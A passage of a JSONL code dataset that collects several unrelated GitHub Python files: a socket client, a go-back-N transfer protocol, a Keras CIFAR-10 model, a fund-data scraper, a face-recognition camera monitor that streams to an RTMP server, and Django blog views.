firstNumber and case == 'Random':\n print('Second number must be greater than first number')\n elif firstNumber == secondNumber and case == 'Random':\n print('First and second is equal')\n \n if case == 'Add' or case == 'Subtract':\n orderImportant = False\n\n\n sendString = str(case+','+str(firstNumber)+','+str(secondNumber)).encode()\n clientSocket.send(sendString)\n recievedResult = clientSocket.recv(1024).decode()\n print(recievedResult)","repo_name":"NHThomsen/ObgOpg4","sub_path":"TcpClient/TcpClient/TcpClient.py","file_name":"TcpClient.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75002070490","text":"import json\nimport requests\nimport os\n\n\ndef read_file(file_path):\n with open(file_path, 'r') as f:\n data = f.read()\n f.close()\n return data\n\ndef get_address(fog05_api,entity,interface):\n result = fog05_api.fdu.instance_info(entity)['hypervisor_info']['network'][interface]['addresses'][0]['address']\n print('Indirizzo: ' + result)\n return result\n\ndef load_descriptor(descriptor):\n return json.loads(read_file(descriptor))\n\ndef get_data_files(data):\n result = {}\n for node in os.listdir(data):\n if 'DS_Store' not in node:\n node_path = os.path.join(data, node)\n result[node] = {}\n for dataset in os.listdir(node_path):\n if 'DS_Store' not in dataset:\n dataset_path = os.path.join(node_path, dataset)\n index = int(dataset)\n result[node].update({index: {}})\n for file in os.listdir(dataset_path):\n result[node][index].update({file: os.path.join(dataset_path, file)})\n return result\n\ndef load_data(address, files):\n endpoint = 'http://' + address + '/load_data'\n r = requests.post(endpoint, files=files)\n\ndef __check_compatibility(node, constraint, value):\n\t# Sottrarre alla capacità del nodo le risorse necessarie all'allocazione dei nodi già in esecuzione e mappati su di esso e controllare se la differenza basta a mappare l'entità considerata\n\treturn True\n\t'''\n\tif requirement == 'os':\n\t\tif self.fog05_api.node.info(node)[constraint] == value:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telif requirement == 'ram':\n\t\tif self.fog05_api.node.info(node)[constraint] == value:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t'''\n\t# Da implementare:\n\t# cpu, disks, io, accelerator, network, position\n\t# Guardare il file fos_types.atd\n\ndef get_nodes_mapping(fog05_api, arch_requirements, environment):\n\tnodes = fog05_api.node.list()\n\tif len(nodes) == 0:\n\t\tprint('No compatible mapping found!')\n\t\treturn None\n\n\tresult = {}\n\tfor entity, node_requirements in arch_requirements.items():\n\t\tfor node in nodes:\n\t\t\tcompatible = True\n\t\t\tfor constraint, value in node_requirements.items():\n\t\t\t\tcompatible = __check_compatibility(node, constraint, value)\n\t\t\tif compatible:\n\t\t\t\tresult[entity] = node\n\t\t\t\tbreak\n\n\tif len(result.keys()) == len(arch_requirements.keys()):\n\t\treturn result\n\telse:\n\t\treturn None\n","repo_name":"Davide-DD/fog05-orchestrator","sub_path":"src/architecture_repository/architectures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19852381008","text":"import socket\nimport _thread\nimport sys\nimport utils\nimport argparse\nfrom utils import Timer\nimport time\nimport random\n\n# Parameters used in this implementation\nLOWER_LIMT_PACKET= 64\nUPPER_LIMIT_PACKET= 256\nWINDOW_SIZE= 7\n# WINDOW_SIZE= 7\n# WINDOW_SIZE= 9\n# WINDOW_SIZE= 2\nTIMEOUT=0.5 # give a timeout after 0.5 seconds of no ack\nSENDER_ADDRESS= ('10.0.0.1', 9999)\n# SENDER_ADDRESS= ('localhost', 9999)\nRECEIVER_ADDRESS=('10.0.0.2', 8080 )\n# RECEIVER_ADDRESS=('localhost', 8080 )\nPERIOD= 0.05\n\n# lock to be used \nlock=_thread.allocate_lock() \n# initialise last ack\nlast_ack=-1 \n# make a timer object to keep track of time\nsend_timer = Timer(TIMEOUT)\n\n#open file and convert to bytes\ndef receiving_ack(sock):\n \"\"\" Helper function that would run on a thread,\n to keep a check for receiving ack in the senders side \"\"\"\n global lock\n global last_ack\n global send_timer\n\n while True:\n # receive packet and extract\n packet = utils.receive_packet(sock)[0]\n ack = utils.extract_packet(packet)[0]\n print(\"Received Ackowlegement for packet number \",ack )\n # if ack received was greater than what was stored as last \n # acknoledged ack then sender should increment the last ack variable\n # and stop the timer \n # if the sender is sending packets this function \n # would wait till that ends by the means of lock\n if(ack>=last_ack):\n lock.acquire()\n last_ack=ack\n send_timer.stop()\n lock.release()\n\ndef sender(filename):\n # main sender function\n global lock\n global last_ack\n global send_timer\n\n seq_num = 0\n \n # open file for reading \n file = open(filename, 'rb')\n # open a socket in the sender side\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(SENDER_ADDRESS) \n \n # list to store all packets\n all_packets=[]\n\n while True:\n # packet size which is randomly chosen\n packet_size = (int)(random.randint(LOWER_LIMT_PACKET, UPPER_LIMIT_PACKET+1))\n data_packet = file.read(packet_size)\n \n if not data_packet:\n # if all the packets have been send then break\n break\n\n # make the data packet and increment the seq_num\n data_packet = utils.make_packet(seq_num, data_packet)\n seq_num += 1\n\n all_packets.append(data_packet)\n\n # now that i have created all my data\n num_packets= len(all_packets)\n # sender will be receiving on another thread\n _thread.start_new_thread(receiving_ack,(sock,))\n\n\n while last_ack < num_packets-1:\n print(\"Last ack is \", last_ack) \n print(\"Num Packets is \", num_packets) \n # if the receiving ack business is not done the lock will not be freed\n lock.acquire()\n #send n(window size) packets of size\n for i in range(1,min(WINDOW_SIZE, num_packets-last_ack)):\n #send n packets\n utils.send_packet(all_packets[last_ack+i],sock, RECEIVER_ADDRESS)\n # last_sent=last_ack+i;\n\n\n #while waiting for timeout check for acks in between \n if not send_timer.running():\n # start the timer\n send_timer.start()\n\n #\n while not send_timer.timeout() and send_timer.running():\n lock.release()\n time.sleep(PERIOD)\n lock.acquire()\n\n if send_timer.timeout():\n send_timer.stop()\n print(\"timeout\")\n else:\n pass\n #last_ack has been updated in the receive function\n\n # once all the window has been sent and ack or timeout has occurred begin again \n lock.release()\n\n # sending an empty packet to show end of transmission\n utils.send_packet(b'',sock,RECEIVER_ADDRESS)#to confirm completion\n file.close()\n\n sock.close()\n\ndef receive(sock, filename):\n # open file for writing the received packets\n with open(filename, 'wb') as file:\n # starting with the expected frame of sequence number 0\n exp_frame = 0\n while True:\n # get the next packet from the sender\n pkt, addr = utils.receive_packet(sock)\n \n if not pkt:\n # empty packet therefore end of transmission\n break\n\n # extract the sequence number and data from the packet\n seq_num, data = utils.extract_packet(pkt)\n\n if seq_num == exp_frame:\n # if the sequence number is equal to the expected frame then send an ack and\n # increment the expected frame number\n pkt = utils.make_packet(exp_frame)\n utils.send_ack(pkt, sock, addr)\n exp_frame += 1\n \n print(\"Received Sequence number \", seq_num)\n # write the frame into the file\n file.write(data)\n else:\n # send a ack for the last received frame since it might have been \n # dropped if the expected frame sequence has not come.\n # so that the sender would update it's last ack\n print(\"Requested Sequence number \", exp_frame-1)\n pkt = utils.make_packet(exp_frame-1)\n utils.send_ack(pkt, sock, addr)\n\n\ndef receiver(filename):\n # open a socket at the receiver's end\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(RECEIVER_ADDRESS)\n receive(sock, filename)\n sock.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--receiver\", help=\"start receiver\", action=\"store_true\")\n parser.add_argument(\"--sender\", help=\"start sender\", action=\"store_true\")\n parser.add_argument(\"--filename\", help=\"File name\", type=str, required=True)\n args = parser.parse_args()\n \n if args.receiver:\n print(\"Started the receiver\")\n receiver(args.filename)\n else:\n print(\"Started the sender\")\n sender(args.filename)\n","repo_name":"4rshdeep/go-back-n-protocol","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36930122990","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 18 10:36:27 2018\n\n@author: Francisco\n\"\"\"\n\n# Importacion de modulos\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef pruebas():\n \n sig_type = { 'tipo': 'senoidal', \n 'frecuencia': (3, 10, 20), # Uso de tuplas para las frecuencias \n 'amplitud': (1, 1, 1),\n 'fase': (0, 0, 0)\n } \n # Como también puedo agregar un campo descripción de manera programática\n # este tipo de sintaxis es *MUY* de Python\n sig_type['descripcion'] = [ str(a_freq) + ' Hz' for a_freq in sig_type['frecuencia'] ]\n\n # Datos generales de la simulación\n fs = 1000.0 # frecuencia de muestreo (Hz)\n N = 10 # cantidad de muestras\n \n ts = 1/fs # tiempo de muestreo\n \n # grilla de sampleo temporal\n tt = np.linspace(0, (N-1)*ts, N)\n print(tt)\n \n # Concatenación de matrices:\n # Creamos una matriz vacia con np.array. Luego, con reshape hacemos que sea una matriz vacia de N filas y 1 columna\n # Guardaremos las señales creadas al ir poblando la siguiente matriz vacía\n \n x = np.array([], dtype=np.float)\n print(x)\n x = x.reshape(N,0)\n print(x)\n\n for this_amp, this_freq, this_phase in zip(sig_type['amplitud'], sig_type['frecuencia'], sig_type['fase']):\n # prestar atención que las tuplas dentro de los diccionarios también pueden direccionarse mediante \"ii\"\n aux = this_amp * np.sin( 2*np.pi*this_freq*tt + this_phase )\n print(aux)\n aux = aux.reshape(N,1)\n print(aux)\n # para concatenar horizontalmente es necesario cuidar que tengan iguales FILAS\n x = np.hstack([x, aux])\n print(x)\n\npruebas()\n \n ","repo_name":"franmaiocchi/DSP","sub_path":"Ejemplos/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30291288976","text":"# Simple CNN model for CIFAR-10\nimport numpy\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.constraints import maxnorm\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\n\n# fix random seed for reproducibility\nseed = 7\nnumpy.random.seed(seed)\n# load data\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\n# normalize inputs from 0-255 to 0.0-1.0\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n# Create the model\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(3, 32, 32), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.2))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', kernel_constraint=maxnorm(3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n# Compile model\nepochs = 1\nlrate = 0.01\ndecay = lrate/epochs\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nprint(model.summary())\n# Fit the model\nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=epochs, batch_size=32)\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\nlabel_list_path = 'datasets/cifar-10-batches-py/batches.meta'\n\nkeras_dir = os.path.expanduser(os.path.join('~', '.keras'))\ndatadir_base = os.path.expanduser(keras_dir)\nif not os.access(datadir_base, os.W_OK):\n datadir_base = os.spath.join('/tmp', '.keras')\nlabel_list_path = os.path.join(datadir_base, label_list_path)\n\nwith open(label_list_path, mode='rb') as f:\n labels = pickle.load(f)\nprint(\"Load label names %s\" % label_list_path)\n\n# Evaluate with test dataset and share same prediction results\nevaluation = model.evaluate_generator(datagen.flow(X_test, y_test, batch_size=batch_size),\n steps=x_test.shape[0] // batch_size)\nprint('Model accuracy = %.2f' % evaluation[1])\n\npredict_gen = model.predict_generator(datagen.flow(X_test, y_test, batch_size=batch_size),\n steps=X_test.shape[0] // batch_size)\nfor predict_index, predicted_y in enumerate(predict_gen):\n actual_label = labels['label_names'][np.argmax(y_test[predict_index])]\n predicted_label = labels['label_names'][np.argmax(predicted_y)]\n print('Actual label = %s vs. Predicted label = %s' % (actual_label, predicted_label))","repo_name":"pallavidesai/PythonDeepLearningICP","sub_path":"DLICP5/src/image_classification_withLess COnvoLayer.py","file_name":"image_classification_withLess COnvoLayer.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37550939930","text":"# -*-coding:utf-8 -*-\nimport re\nimport csv\nimport time\nimport requests\nimport pandas as pd\nfrom load_to_data.loadData import loadData\n\n\nclass fundSpider(object):\n ldata = loadData\n\n def __init__(self):\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n 'Referer': 'http://fund.eastmoney.com/data/fundranking.html'}\n self.listPagePath = \"列表页.csv\"\n self.historyPath = \"历史净值明细.csv\"\n self.industryPath = \"行业.csv\"\n\n def listPage(self): # 列表页\n title = [\"基金代码\", \"基金简称\", \"日期\", \"单位净值\", \"累计净值\", \"日增长率\", \"近1周\", \"近1月\", \"近3月\", \"近6月\", \"近1年\", \"近2年\", \"近3年\", \"今年来\",\n \"成立以来\", \"手续费\"]\n ed = str(time.strftime(\"%Y-%m-%d\")) # 今天的时间\n for pi in range(1, 123):\n url = \"http://fund.eastmoney.com/data/rankhandler.aspx?op=ph&dt=kf&ft=all&rs=&gs=0&sc=zzf&st=desc&sd={}&ed={}&qdii=&tabSubtype=,,,,,&pi={}&pn=50&dx=1\".format(\n ed, ed, str(pi))\n res = requests.get(url=url, headers=self.headers, timeout=10).content.decode()\n print(res)\n data_list = re.findall(r'\"(.*?)\"', res, re.S)\n for data in data_list:\n item_list = re.findall(r'(.*?),', data, re.S)\n for num in [2, 15, 15, 15, 15]:\n del item_list[num]\n for i in range(0, 3):\n item_list.pop()\n print(pi, item_list)\n self.ldata().to_mongo(title, item_list, \"page_vals\")\n\n def history(self): # 历史净值明细\n title = [\"基金代码\", \"基金简称\", \"日期\", \"单位净值\", \"累计净值\", \"日增长率\"]\n df = pd.read_csv(self.listPagePath, encoding=\"utf-8\", dtype={\"基金代码\": str})\n source_list = df.values.tolist()\n y = 0\n for source in source_list:\n y += 1\n url = \"http://api.fund.eastmoney.com/f10/lsjz?fundCode={}&pageIndex=1&pageSize=200\".format(source[0])\n res = requests.get(url=url, headers=self.headers, timeout=10).content.decode()\n data_list = re.findall(r'\"(.*?)\"', res, re.S)\n num = 0\n for data in data_list:\n num += 1\n if data == \"FSRQ\":\n day_growth = data_list[num + 11] # 日增长率\n if day_growth == \"FHFCZ\":\n day_growth = data_list[num + 6]\n item = [source[0], source[1], data_list[num], data_list[num + 2], data_list[num + 4], day_growth]\n print(y, item)\n self.ldata().to_mongo(self, title, item, \"hostory_vals\")\n\n def industry(self): # 行业\n title = [\"基金代码\", \"基金简称\", \"行业类别\", \"占净值比例\", \"市值(万元)\"]\n df = pd.read_csv(self.listPagePath, encoding=\"utf-8\", dtype={\"基金代码\": str})\n source_list = df.values.tolist()\n y = 0\n for source in source_list:\n y += 1\n self.headers[\"Referer\"] = \"http://fundf10.eastmoney.com/hytz_{}.html\".format(source[0])\n url = \"http://api.fund.eastmoney.com/f10/HYPZ/?fundCode={}&year=2020\".format(source[0])\n res = requests.get(url=url, headers=self.headers, timeout=10).content.decode()\n print(res)\n HYMC = re.findall(r'\"HYMC\":\"(.*?)\"', res, re.S) # 行业类别\n ZJZBL = re.findall(r'\"ZJZBL\":\"(.*?)\"', res, re.S) # 占净值比例\n SZDesc = re.findall(r'\"SZDesc\":\"(.*?)\"', res, re.S) # 市值(万元)\n num = 0\n for data in HYMC:\n item = [source[0], source[1], data, ZJZBL[num], SZDesc[num]]\n print(y, item)\n self.ldata().to_mongo(title, item, \"industry_vals\")\n num += 1\n\n\nif __name__ == '__main__':\n obj = fundSpider()\n obj.listPage() # 此方法每天执行\n # obj.history() # 此方法只要执行一次就可以了,每天执行obj.listPage()已经有该数据了\n # obj.industry() # 此方法一个月执行一次就可以了\n","repo_name":"PythonWithStart/address_all_start","sub_path":"Quant_all/fund_to_data.py","file_name":"fund_to_data.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70561097053","text":"import cv2\nimport queue\nimport os\n\nimport imutils\nimport numpy as np\nfrom threading import Thread\nimport datetime, _thread\nimport subprocess as sp\nimport time\n\nimport argparse\nfrom oldcare.facial import FaceUtil\nfrom PIL import Image, ImageDraw, ImageFont\nfrom oldcare.utils import fileassistant\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport time\nimport numpy as np\nimport os\nimport imutils\nimport subprocess\n\n\nVIDEO_WIDTH = 640\nVIDEO_HEIGHT = 480\nANGLE = 20\n# 全局常量\n\nlimit_time = 2\n# 使用线程锁,防止线程死锁\nmutex = _thread.allocate_lock()\n# 存图片的队列\nframe_queue = queue.Queue()\n\nrtmpUrl = \"rtmp://39.97.107.19:1935/rtmplive\"\n\n# \"rtmp://39.97.107.19:1935/rtmplive\"\n\n\ncommand = ['ffmpeg',\n\n '-y',\n\n '-f', 'rawvideo',\n\n '-vcodec', 'rawvideo',\n\n '-pix_fmt', 'bgr24',\n\n '-s', \"{}x{}\".format(640, 480), # 图片分辨率\n\n '-r', str(13.0), # 视频帧率\n\n '-i', '-',\n\n '-c:v', 'libx264',\n\n '-pix_fmt', 'yuv420p',\n\n '-preset', 'ultrafast',\n\n '-f', 'flv',\n\n rtmpUrl]\n\n\ndef Video():\n # 调用相机拍图的函数\n\n vid = cv2.VideoCapture(0)\n time.sleep(2);\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n\n while (vid.isOpened()):\n return_value, frame = vid.read()\n\n # 原始图片推入队列中\n\n frame_queue.put(frame)\n frame_queue.get() if frame_queue.qsize() > 1 else time.sleep(0.01)\n\n\ndef push_frame():\n # 推流函数\n facial_recognition_model_path = 'info/face_recognition_hog.pickle' # jian ce ren lian\n facial_expression_model_path = 'models/face_expression_seven_class.hdf5' # fenxi qinggan\n\n output_stranger_path = 'supervision/strangers'\n output_smile_path = 'supervision/smile'\n\n people_info_path = 'info/people_info.csv'\n facial_expression_info_path = 'info/facial_expression_info_seven_class.csv'\n faceutil = FaceUtil(facial_recognition_model_path)\n facial_expression_model = load_model(facial_expression_model_path, compile=False)\n # 初始化人脸识别模型\n\n # your python path\n python_path = '/root/anaconda3/envs/tensorflow/bin/python'\n\n # 全局常量\n FACIAL_EXPRESSION_TARGET_WIDTH = 48\n FACIAL_EXPRESSION_TARGET_HEIGHT = 48\n\n ANGLE = 20\n\n # 得到 ID->姓名的map 、 ID->职位类型的map、\n # 摄像头ID->摄像头名字的map、表情ID->表情名字的map\n id_card_to_name, id_card_to_type = fileassistant.get_people_info(\n people_info_path)\n facial_expression_id_to_name = fileassistant.get_facial_expression_info(\n facial_expression_info_path)\n\n # 控制陌生人检测\n strangers_timing = 0 # 计时开始\n strangers_start_time = 0 # 开始时间\n strangers_limit_time = 2 # if >= 2 seconds, then he/she is a stranger.\n\n # 控制微笑检测\n facial_expression_timing = 0 # 计时开始\n facial_expression_start_time = 0 # 开始时间\n facial_expression_limit_time = 2 # if >= 2 seconds, he/she is smiling\n\n accum_time = 0\n\n curr_fps = 0\n\n fps = \"FPS: ??\"\n\n # prev_time = time()\n\n # 防止多线程时 command 未被设置\n\n while True:\n print('command lenth', len(command))\n if len(command) > 0:\n # 管道配置,其中用到管道\n\n p = sp.Popen(command, stdin=sp.PIPE)\n\n break\n\n while True:\n faceutil = FaceUtil(facial_recognition_model_path)\n facial_expression_model = load_model(facial_expression_model_path, compile=False)\n if frame_queue.empty() != True:\n counter = 0\n\n while True:\n counter += 1\n image = frame_queue.get()\n\n\n image=cv2.flip(image, 1)\n\n image = imutils.resize(image, width=VIDEO_WIDTH,\n height=VIDEO_HEIGHT) # 压缩,加快识别速度\n\n # if counter%10!=0:\n # \tcv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n # \t\t\t image)\n #\n # \t# Press 'ESC' for exiting video\n # \tk = cv2.waitKey(1) & 0xff\n # \tcontinue\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # grayscale,表情识别\n\n # if True:\n # \tcv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n # \t\t\t gray)\n # \tcontinue\n\n face_location_list, names = faceutil.get_face_location_and_name(\n image)\n\n # 得到画面的四分之一位置和四分之三位置,并垂直划线\n one_fourth_image_center = (int(VIDEO_WIDTH / 4),\n int(VIDEO_HEIGHT / 4))\n three_fourth_image_center = (int(VIDEO_WIDTH / 4 * 3),\n int(VIDEO_HEIGHT / 4 * 3))\n\n cv2.line(image, (one_fourth_image_center[0], 0),\n (one_fourth_image_center[0], VIDEO_HEIGHT),\n (0, 255, 255), 1)\n cv2.line(image, (three_fourth_image_center[0], 0),\n (three_fourth_image_center[0], VIDEO_HEIGHT),\n (0, 255, 255), 1)\n\n # 处理每一张识别到的人脸\n for ((left, top, right, bottom), name) in zip(face_location_list,\n names):\n\n # 将人脸框出来\n rectangle_color = (0, 0, 255)\n if id_card_to_type[name] == 'old_people':\n rectangle_color = (0, 0, 128)\n elif id_card_to_type[name] == 'employee':\n rectangle_color = (255, 0, 0)\n elif id_card_to_type[name] == 'volunteer':\n rectangle_color = (0, 255, 0)\n else:\n pass\n cv2.rectangle(image, (left, top), (right, bottom),\n rectangle_color, 2)\n\n # 陌生人检测逻辑\n if 'Unknown' in names: # alert\n if strangers_timing == 0: # just start timing\n strangers_timing = 1\n strangers_start_time = time.time()\n else: # already started timing\n strangers_end_time = time.time()\n difference = strangers_end_time - strangers_start_time\n\n current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n\n if difference < strangers_limit_time:\n print('[INFO] %s, 房间, 陌生人仅出现 %.1f 秒. 忽略.' % (current_time, difference))\n else: # strangers appear\n event_desc = '陌生人出现!!!'\n event_location = '房间'\n print('[EVENT] %s, 房间, 陌生人出现!!!' % (current_time))\n cv2.imwrite(os.path.join(output_stranger_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n image) # snapshot\n pic_path = os.path.join(output_stranger_path, 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S')))\n # insert into database\n command1 = '%s inserting.py --event_desc %s --event_type 2 --event_location %s --pic_path %s' % (\n python_path, event_desc, event_location,pic_path)\n p2 = subprocess.Popen(command1, shell=True)\n\n # 开始陌生人追踪\n unknown_face_center = (int((right + left) / 2),\n int((top + bottom) / 2))\n\n cv2.circle(image, (unknown_face_center[0],\n unknown_face_center[1]), 4, (0, 255, 0), -1)\n\n direction = ''\n # face locates too left, servo need to turn right,\n # so that face turn right as well\n if unknown_face_center[0] < one_fourth_image_center[0]:\n direction = 'right'\n elif unknown_face_center[0] > three_fourth_image_center[0]:\n direction = 'left'\n\n # adjust to servo\n if direction:\n print('%d-摄像头需要 turn %s %d 度' % (counter,\n direction, ANGLE))\n\n else: # everything is ok\n strangers_timing = 0\n\n # 表情检测逻辑\n # 如果不是陌生人,且对象是老人\n if name != 'Unknown' and id_card_to_type[name] == 'old_people':\n # 表情检测逻辑\n roi = gray[top:bottom, left:right]\n roi = cv2.resize(roi, (FACIAL_EXPRESSION_TARGET_WIDTH,\n FACIAL_EXPRESSION_TARGET_HEIGHT))\n roi = roi.astype(\"float\") / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # determine facial expression\n emotions = ['Angry', 'Disgust', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\n\n emotion_value_list = facial_expression_model.predict(roi)[0]\n\n facial_expression_label = emotions[np.argmax(emotion_value_list)]\n\n if facial_expression_label == 'Happy': # alert\n if facial_expression_timing == 0: # just start timing\n facial_expression_timing = 1\n facial_expression_start_time = time.time()\n else: # already started timing\n facial_expression_end_time = time.time()\n difference = facial_expression_end_time - facial_expression_start_time\n\n current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n if difference < facial_expression_limit_time:\n print('[INFO] %s, 房间, %s仅笑了 %.1f 秒. 忽略.' % (\n current_time, id_card_to_name[name], difference))\n else: # he/she is really smiling\n event_desc = '%s正在笑' % (id_card_to_name[name])\n event_location = '房间'\n print('[EVENT] %s, 房间, %s正在笑.' % (current_time, id_card_to_name[name]))\n pic_path = os.path.join(output_smile_path,'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S')))\n cv2.imwrite(pic_path,image) # snapshot\n\n # insert into database\n command1 = '%s inserting.py --event_desc %s --event_type 0 --event_location %s --old_people_id %d --pic_path %s' % (\n python_path, event_desc, event_location, int(name),pic_path)\n p2 = subprocess.Popen(command1, shell=True)\n\n else: # everything is ok\n facial_expression_timing = 0\n\n else: # 如果是陌生人,则不检测表情\n facial_expression_label = ''\n\n # 人脸识别和表情识别都结束后,把表情和人名写上\n # (同时处理中文显示问题)\n img_PIL = Image.fromarray(cv2.cvtColor(image,\n cv2.COLOR_BGR2RGB))\n\n draw = ImageDraw.Draw(img_PIL)\n final_label = id_card_to_name[name] + ': ' + facial_expression_id_to_name[facial_expression_label] if facial_expression_label else id_card_to_name[name]\n draw.text((left, top - 30), final_label,\n font=ImageFont.truetype('NotoSansCJK-Black.ttc', 40),\n fill=(255, 0, 0)) # linux\n\n # 转换回OpenCV格式\n image = cv2.cvtColor(np.asarray(img_PIL), cv2.COLOR_RGB2BGR)\n\n # show our detected faces along with smiling/not smiling labels\n p.stdin.write(image.tostring())\n cv2.imshow(\"Checking Strangers and Ole People's Face Expression\",\n image)\n\n # Press 'ESC' for exiting video\n k = cv2.waitKey(1) & 0xff\n if k == 27:\n break\n\n\ndef run():\n # 使用两个线程处理\n\n thread1 = Thread(target=Video, )\n\n thread1.start()\n time.sleep(2)\n\n thread2 = Thread(target=push_frame, )\n\n thread2.start()\n\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n run()\n\n\n","repo_name":"dbylx/IntelligentCareSystem_CV","sub_path":"cv_part/camera_monitoring/tranfor.py","file_name":"tranfor.py","file_ext":"py","file_size_in_byte":13873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13789745000","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.generic import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Q\n\n\n@require_GET\ndef HomePage(request):\n category = request.GET.get(\"category\")\n if category:\n posts = Post.objects.filter(category=category)\n else:\n posts = Post.objects.all()\n \n page = request.GET.get(\"page\")\n paginator = Paginator(posts, 14) # view 16 post by page\n current_page = paginator.get_page(page)\n\n # send Showcase and Popular posts\n popular_posts = Post.objects.order_by(\"-upload_date\")[:6]\n showcase_posts = Post.objects.order_by(\"likes\")[:3]\n\n content = {\"posts\": current_page, \"popular_posts\": popular_posts, \"showcase_posts\": showcase_posts}\n return render(request, \"Main/home.html\", content)\n\n\n\nclass PostDetailPage(View):\n\n def get(self, request, slug):\n post = get_object_or_404(Post, slug=slug)\n # send Popular posts\n popular_posts = Post.objects.order_by(\"-upload_date\")[:6]\n return render(request, \"Main/post_detail.html\", {\"post\": post, \"popular_posts\": popular_posts})\n\n def post(self, request, slug):\n content = request.POST.get(\"content\")\n post = get_object_or_404(Post, slug=slug)\n if request.user.is_authenticated:\n Comment.objects.create(post=post, content=content, owner=request.user)\n else:\n Comment.objects.create(post=post, content=content, anonymous_name=request.POST.get(\"anonymous_name\"))\n return HttpResponse(\"Comment Created\", status=200)\n\n\n@method_decorator(login_required(login_url=\"/login/\"), name=\"dispatch\")\nclass PostUploadPage(View):\n\n def get(self, request):\n upload_form = PostUploadForm()\n return render(request, \"Main/post_upload.html\", {\"form\": upload_form})\n\n def post(self, request):\n post_form = PostUploadForm(request.POST, request.FILES)\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.owner = request.user\n post.save()\n return redirect(PostDetailPage, slug=post.slug)\n\n else:\n errors = post_form.errors\n upload_form = PostUploadForm()\n return render(request, \"Main/post_upload.html\", {\"form\": upload_form, \"errors\": errors})\n\n\n@require_GET\ndef SearchPost(request):\n query = request.GET.get(\"query\")\n posts = Post.objects.filter(Q(title__icontains=query) | Q(content__icontains=query))\n popular_posts = Post.objects.all().order_by(\"-title\")[:6]\n return render(request, \"Main/search.html\", {\"posts\": posts, \"popular_posts\": popular_posts})","repo_name":"nearFuture00/django-blog","sub_path":"Main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26477213391","text":"from flask_apispec import MethodResource\nfrom flask_apispec import doc\nfrom 